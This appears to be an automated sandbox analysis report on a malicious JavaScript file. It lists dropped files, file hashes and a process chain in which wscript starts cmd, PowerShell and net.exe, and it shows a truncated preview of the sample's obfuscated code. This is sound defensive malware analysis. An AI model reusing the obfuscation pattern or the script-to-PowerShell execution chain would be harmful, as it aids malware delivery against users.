Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.2959471027452345 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfYdPeUkwRe9:YvXKXfVH0cQmsGg8Ukee9 |
MD5: | 07E8D541261394FB014D57EBF9D6F235 |
SHA1: | 8C97E882B490D20F1A897D02B6ED8B00D1F7274C |
SHA-256: | EB745FCF1CED1AE287ACFB514AA88E1BDB2C18C33DCE4A6DDB547E6F24F0126E |
SHA-512: | E75AF91E19CE5481C259AE04AE9A2F98BB285A87B0C9D4179D4FF4BB89480839C03BFCA7F159192894813140452A048FC902CC441C5395DB8A8A62DC44FEACB2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.281926121743199 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJf+dPeUkwRe9:YvXKXfVH0cQmsG28Ukee9 |
MD5: | 76E11D9858DC9A686133883ED818EE25 |
SHA1: | D7EB12A2AA5D008A70EB1A9E79CBB23BA267EBF0 |
SHA-256: | EF5C4A73D5464BC748D5143E3F4154A8B1EF7698A7FD2733F989292903433271 |
SHA-512: | 0DC0679ACCCE8362510905E9D2226E10EA6C7511D6B86E0FFB8F4E2B7EE2A085351220B9C09FF499727024B6481193E08FD231964D47E8611351D9256E3EC6BB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 291 |
Entropy (8bit): | 5.2795220553830475 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfbPtdPeUkwRe9:YvXKXfVH0cQmsGDV8Ukee9 |
MD5: | 9ED322763DB34DC8F7079F1447269190 |
SHA1: | B2AE932D934ADE58092374D76C89C20D4B38E719 |
SHA-256: | EC13964236F6BD6A5FA65B05F66EEB360585DF5EC0B4F1F9E96A0D8090E2B673 |
SHA-512: | 9F52207F24C6E8BDB19CB5A7A871573CDF792B35BE8A66FA4CB92AC4BC8008537E10F257B6A314FB598CCA00089EE9F5F0FE8AB009EA97ED4AC2DEE5F96635DA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 287 |
Entropy (8bit): | 5.283143143133164 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJf21rPeUkwRe9:YvXKXfVH0cQmsG+16Ukee9 |
MD5: | 882D5BBD8FAE10A020984EA1D9E3BE93 |
SHA1: | 6B4A1004F4B63687EFD6F441594DB0866E481A15 |
SHA-256: | AD98A8C28416BBDA4CBD95915173D3C8713A5AEEE734846F48ED367D166B50EA |
SHA-512: | 0C758E8A0D2D5F76BBE049FFB97F826439A2E54F6D0419E7E5008CF90086538766389F28659C2E307567F0C840C501B872B8FA26E003621EC5E485C024746F5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1090 |
Entropy (8bit): | 5.662298393631724 |
Encrypted: | false |
SSDEEP: | 24:Yv6X1ZQSamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSl:YvUBgkDMUJUAh8cvMl |
MD5: | 80362BDB2AD1544A1BF3A1E61549CAAE |
SHA1: | D9FCC1FC30F8ABEFD75CE88034F7DACCEFB0A915 |
SHA-256: | 4066BFDFE1C03F2E6C1070C47781C2D07B3DB79D92F4E2E7C9ED8A4280998F48 |
SHA-512: | A4A3BED272F192F243437E66C8F63389A015EAA68EB5BD4EB8F807C9FF8CFA4382B023F49BBFFA28A7C27429F42B023A288CD714D9B80B20D31F50B810FBBCD5 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Upsell_Cards
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 286 |
Entropy (8bit): | 5.261737872870952 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJfshHHrPeUkwRe9:YvXKXfVH0cQmsGUUUkee9 |
MD5: | E37FD3C3000F791F8C164155D767D4B4 |
SHA1: | CB0BD92594ABBFC7DE83BAD7F30786572581B47F |
SHA-256: | AC13CE4CE50F2EB9EDC1CF28C76F29312489CEC7A7529C12FB880AB28B5408A2 |
SHA-512: | 9E885DFB2034BF16DBFDD029E9972CFFE46A4DFA3830D2B0D5DCF0F196D8E45994429981B5960A53CD27DBAD45F3E100EA5A58C863723B7276B44307A16ABAA6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 282 |
Entropy (8bit): | 5.266550149233931 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXCcSIIAlh0nZiQ0YvkXDoAvJTqgFCrPeUkwRe9:YvXKXfVH0cQmsGTq16Ukee9 |
MD5: | 49AA4E6D8CFCBC0AC677F276232F18D8 |
SHA1: | D2D3735A1C1DD6CC86781E386AC8ED8E5A702FA4 |
SHA-256: | BFADB9EB21BF8D71E776EBF936C30D4D55070CF9A012FC7BA386B87A4ED86D3F |
SHA-512: | 61112C327B2E5FDE1A60F974F93C88419759FD39B461BE1E6C8C0BE60603F8F383D39E97C0280037BE0D6CA5DA39B196E75B9E34B6296707A72B6F0EE0332A75 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4 |
Entropy (8bit): | 0.8112781244591328 |
Encrypted: | false |
SSDEEP: | 3:e:e |
MD5: | DC84B0D741E5BEAE8070013ADDCC8C28 |
SHA1: | 802F4A6A20CBF157AAF6C4E07E4301578D5936A2 |
SHA-256: | 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06 |
SHA-512: | 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 2814 |
Entropy (8bit): | 5.143280744131317 |
Encrypted: | false |
SSDEEP: | 24:YfpnaHBayQCg9vRoq+Frumr5WQ77yjlE2j0S+pOq2WP2LSQC39HxtncZNd5Dh9Bu:YhrCSvqq+FrumFauIOLek9RtcZrJh9o |
MD5: | D07188A2FEEBF4A9600040497FC58A24 |
SHA1: | 6B4E52D501313B7773ED5D5656693EDD987F6BF9 |
SHA-256: | 03A64C2482AF86759F352CC290A71C305E33953FBFE37E683DC30CEB11E31964 |
SHA-512: | FC5C030EB79AA3D09771A813364E1CD522704ED70E08FA89AAB239884126F61D1F20CA6D33A7CBAB4A8DD8988F56CBB069384976D9F47F36965210781C2FD8D9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 12288 |
Entropy (8bit): | 1.146481571205633 |
Encrypted: | false |
SSDEEP: | 24:TLhx/XYKQvGJF7ursRoRZXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcJ:TFl2GL7msRCXc+XcGNFlRYIX2v3keU |
MD5: | C8954F7CF2D27508108C7D97400650C4 |
SHA1: | FF67A5E010362AEF62AD056E247FC47F73FC1454 |
SHA-256: | A11D70D80ABBF8EA02F72796851C12FAD2A53D90A2A0DD688D062BF1927488A5 |
SHA-512: | D204DBEE1D8F01AE5AE492B5CC3C549795A1DDB867D652CE74EFE22535E9C169C1DD37A681204C8E0D13F8B65DAD805D4435F69D06AE800F10B8AA47C44B81EA |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 1.5519890052645384 |
Encrypted: | false |
SSDEEP: | 24:7+tyoUXcMRZXcMZgux3Fmu3n9u1oGuDyIX4uDyvuOudIUudcHRuLux7FqLxx/XYB:7MydXc+XcGNFlRYIX2vmFqVl2GL7msU |
MD5: | 637146CB34B32812CECA8DF70B9E51BF |
SHA1: | DE3845E6C0219B30E70682F7368359A2F8AC3AD8 |
SHA-256: | F324600D1BB65A8E61C93C8EA5EECEC2C5A71019375B01F37CC53BD94C1DAC24 |
SHA-512: | 16220D9570E50CC6751BA88BB85DE8ADAC6E23DB85B0195B8CCB5A2E8F071A5B9C2BEC69FC0D7605F7A6A973D16AE765FBE900C3F421E7F57C7DCCC00D074A2C |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 66726 |
Entropy (8bit): | 5.392739213842091 |
Encrypted: | false |
SSDEEP: | 768:RNOpblrU6TBH44ADKZEg/TRhoPv5fQyTzhZ1E/kmfCJ5I0EYyu:6a6TZ44ADE/TRuPvdQShFJ5IFK |
MD5: | 51794FDCA3DFC4F16BF22F4B8AC32B20 |
SHA1: | 26F20D076992F6DB22664B1DD3E85AA48E9AC711 |
SHA-256: | 477CC8D3D59902DDE5E8E730408DDBCBF57C7294FB47C53648935929A7F8AD36 |
SHA-512: | AD32E6441A85021360DD5D19CB23AE64635F57A574A56CC9BD4771A931F5BE603EB9E0803DD31C66B53DDE55DE13CF06F42CECB60192E076AA5917903BDDB41B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 64 |
Entropy (8bit): | 1.1940658735648508 |
Encrypted: | false |
SSDEEP: | 3:NlllulDm0ll//Z:NllU6cl/ |
MD5: | DA1F22117B9766A1F0220503765A5BA5 |
SHA1: | D35597157EFE03AA1A88C1834DF8040B3DD3F3CB |
SHA-256: | BD022BFCBE39B4DA088DDE302258AE375AAFD6BDA4C7B39A97D80C8F92981C69 |
SHA-512: | 520FA7879AB2A00C86D9982BB057E7D5E243F7FC15A12BA1C823901DC582D2444C76534E955413B0310B9EBD043400907FD412B88927DAD07A1278D3B667E3D9 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 246 |
Entropy (8bit): | 3.511206980872271 |
Encrypted: | false |
SSDEEP: | 6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8EebClw8wlYH:Qw946cPbiOxDlbYnuRK+blJlYH |
MD5: | 8D4A63556AB7D3EA864F6491A611C2A5 |
SHA1: | E685331988DF82B7151EC5C19BB279FA610191C7 |
SHA-256: | 04CE7FFE0CD99CE4CE75F8C76105431BC5FDFBDFA2A36CFD6874AF0A00E041F4 |
SHA-512: | EB8172094CAEE2B6299F3CE59BEF53D335A02B52B44CD327E15F69E68A48B6C235D8FFFA22266630F8049B7F3F7827556DEDD77614FCDE17F1388D50EDC71AF7 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 60 |
Entropy (8bit): | 4.038920595031593 |
Encrypted: | false |
SSDEEP: | 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX |
MD5: | D17FE0A3F47BE24A6453E9EF58C94641 |
SHA1: | 6AB83620379FC69F80C0242105DDFFD7D98D5D9D |
SHA-256: | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 |
SHA-512: | 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 144514 |
Entropy (8bit): | 7.992637131260696 |
Encrypted: | true |
SSDEEP: | 3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL |
MD5: | BA1716D4FB435DA6C47CE77E3667E6A8 |
SHA1: | AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF |
SHA-256: | AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D |
SHA-512: | 65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2025-01-10 20-36-24-041.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16525 |
Entropy (8bit): | 5.338264912747007 |
Encrypted: | false |
SSDEEP: | 384:lH4ZASLaTgKoBKkrNdOZTfUY9/B6u6AJ8dbBNrSVNspYiz5LkiTjgjQLhDydAY8s:kIb |
MD5: | 128A51060103D95314048C2F32A15C66 |
SHA1: | EEB64761BE485729CD12BF4FBF7F2A68BA1AD7DB |
SHA-256: | 601388D70DFB723E560FEA6AE08E5FEE8C1A980DF7DF9B6C10E1EC39705D4713 |
SHA-512: | 55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 15114 |
Entropy (8bit): | 5.355070068462906 |
Encrypted: | false |
SSDEEP: | 384:YBdU1JgSosXoZ7FKHNmTLs/icm9zYXpXRX+XVXKXrXNX8XUXuXlXT4DE+42iIFYr:vEV |
MD5: | B50DA41933A3F67650CC99402BCAC008 |
SHA1: | 214B0AB7F2F798983F1BEAC0D5ED0B1721E95EB8 |
SHA-256: | DF73152B10899CF4BC07CD6D19196ADEAEE12D88F3CCC7A5613B671C2414DDDD |
SHA-512: | 807049D82EE04839A7DCEB9D32970179D12D48CA8EA0811D8C6E86378793C4763433D6E76F34B4D70EC52FB4C65FAEA23DE77FE602D53E702C7DD293D4048C74 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 29752 |
Entropy (8bit): | 5.397438173246273 |
Encrypted: | false |
SSDEEP: | 192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcb5kcbuIhncb5:V3fOCIdJDePphU |
MD5: | F2EB1DF7D0214A5E22BDB42CD8424F63 |
SHA1: | BAFCCC3D6313F679A5D54AA884B6B542D340B7F0 |
SHA-256: | E0A53AE70F1419388EDA0BB81D594B43262EB661B7D20EEF59B6A0BF1EB79009 |
SHA-512: | 25C7C83439E773F1DD2CC63778DF2ECA5AD4E663E360DDAB7A64F67EF78E77AC78A87289DBDEDC4768F157B3B57BB6D9BAED1D39D68356EF9FF4791144D93390 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1419751 |
Entropy (8bit): | 7.976496077007677 |
Encrypted: | false |
SSDEEP: | 24576:/2wYIGNPRmOWL07otGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:OwZGDbWLxtGZN3mlind9i4ufFXpAXkru |
MD5: | AA6641E4BFC58F44E603CD0EE74AE8FF |
SHA1: | 29F99293E45449226D99AE893FA31E428BA80BF8 |
SHA-256: | 0C9CEF808C626D2412A4548C0F78FAFD52A30D49C36E1ED1CDA2BBF0E1B5F2F1 |
SHA-512: | 65C9820CA8747BB78292D34D7AB4D1F26F73CA4D7DF2C97F3BD87D777B8D00E981AF6CEC2D078AF5BB660EEDE1480608EC701B6F55A1521C6390F42FFDE6D0A2 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 386528 |
Entropy (8bit): | 7.9736851559892425 |
Encrypted: | false |
SSDEEP: | 6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m |
MD5: | 5C48B0AD2FEF800949466AE872E1F1E2 |
SHA1: | 337D617AE142815EDDACB48484628C1F16692A2F |
SHA-256: | F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE |
SHA-512: | 44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1407294 |
Entropy (8bit): | 7.97605879016224 |
Encrypted: | false |
SSDEEP: | 24576:/vlwYIGNPudpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZYs:VwZGU3mlind9i4ufFXpAXkrfUs0qWLxC |
MD5: | DB9166D95F67FFB17BA44727A20D2419 |
SHA1: | 68CBF8E03D873EE9FFFE6127A31129871E41ECF3 |
SHA-256: | 77AAC14338C3D441C327FEE6C563E12825549AD07A40C5C86DF55098178399C0 |
SHA-512: | B0F4FA10FA72934A314A23000CD286EEA6BDC016FFC1DE6458695D104BEE645957B611CC5615C5F13B291C29052386AC8728FBC46190FC20DA4D248CFCBFBAE0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 758601 |
Entropy (8bit): | 7.98639316555857 |
Encrypted: | false |
SSDEEP: | 12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg |
MD5: | 3A49135134665364308390AC398006F1 |
SHA1: | 28EF4CE5690BF8A9E048AF7D30688120DAC6F126 |
SHA-256: | D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B |
SHA-512: | BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 635764 |
Entropy (8bit): | 7.929592005409041 |
Encrypted: | false |
SSDEEP: | 12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ |
MD5: | 91A2AF9E2A61ABF7D9977999FBF9879E |
SHA1: | F6E4FA02DD15B27F74553FB1B220A4D2DF385267 |
SHA-256: | FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A |
SHA-512: | 8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C |
Malicious: | true |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 98682 |
Entropy (8bit): | 6.445287254681573 |
Encrypted: | false |
SSDEEP: | 1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L |
MD5: | 7113425405A05E110DC458BBF93F608A |
SHA1: | 88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF |
SHA-256: | 7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46 |
SHA-512: | 6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 737 |
Entropy (8bit): | 7.501268097735403 |
Encrypted: | false |
SSDEEP: | 12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa |
MD5: | 5274D23C3AB7C3D5A4F3F86D4249A545 |
SHA1: | 8A3778F5083169B281B610F2036E79AEA3020192 |
SHA-256: | 8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97 |
SHA-512: | FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 55 |
Entropy (8bit): | 4.306461250274409 |
Encrypted: | false |
SSDEEP: | 3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y |
MD5: | DCA83F08D448911A14C22EBCACC5AD57 |
SHA1: | 91270525521B7FE0D986DB19747F47D34B6318AD |
SHA-256: | 2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9 |
SHA-512: | 96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 4.928054442419877 |
TrID: | |
File name: | 78786270533822124.js |
File size: | 20'495 bytes |
MD5: | 3e6af5ce304ac32d11f2ff37bfaefa5d |
SHA1: | b6bee2bf0fb93e94f712df48cfe882ce300a7620 |
SHA256: | 09e92fd96c3813619535ca5b13021888de289372273ebcd4654b0db6507a8fd4 |
SHA512: | 5dbde363b9da93d34ee7e49fb365cd8d75d4660afdd88e430515226db988e3baff1e71e0e97865a71d0a3bdf98cbe2ffe68cae3af11fe2cc50f6efef13e2f48c |
SSDEEP: | 384:GTdEDXOA5HlEr8xYcZFr8x2tcjEOcjbU/2a0MFFmAPjJOCLY/OIiS+aT10t7aSI5:pehnz8p0/gSnx2gC/7rwC24X4op164S+ |
TLSH: | B99255C4C019C9C90DE897F099FA08D266D4028DDD58A4EE9841ADC45F0E6AFBCF2D7D |
File Content Preview: | function zttzheqov(){slqisj=[1031,3079,5127,4103,2055,3072];var cnqpv=this[xjpkene+sudhap+bocpk+rjyfs+kajvof+jowpjb+pzuxg+mnrewvvw](this[odntetz+czflbo+yfqesd+bocpk+hiahhd+xjpkene+mnrewvvw][qzsatdlpq+bocpk+kajvof+sudhap+mnrewvvw+kajvof+owsfhu+zdaduzaf+loy |
Icon Hash: | 68d69b8bb6aa9a86 |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 20:36:14 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\wscript.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7aa080000 |
File size: | 170'496 bytes |
MD5 hash: | A47CBE969EA935BDD3AB568BB126BC80 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 20:36:15 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff609b30000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 20:36:15 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 20:36:15 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 5 |
Start time: | 20:36:20 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff651090000 |
File size: | 5'641'176 bytes |
MD5 hash: | 24EAD1C46A47022347DC0F05F6EFBB8C |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 20:36:20 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\cmd.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff609b30000 |
File size: | 289'792 bytes |
MD5 hash: | 8A2122E8162DBEF04694B9C3E0B6CDEE |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 7 |
Start time: | 20:36:20 |
Start date: | 10/01/2025 |
Path: | C:\Windows\System32\net.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff60e1f0000 |
File size: | 59'904 bytes |
MD5 hash: | 0BD94A338EEA5A4E1F2830AE326E6D19 |
Has elevated privileges: | false |
Has administrator privileges: | false |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 8 |
Start time: | 20:36:21 |
Start date: | 10/01/2025 |
Path: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70df30000 |
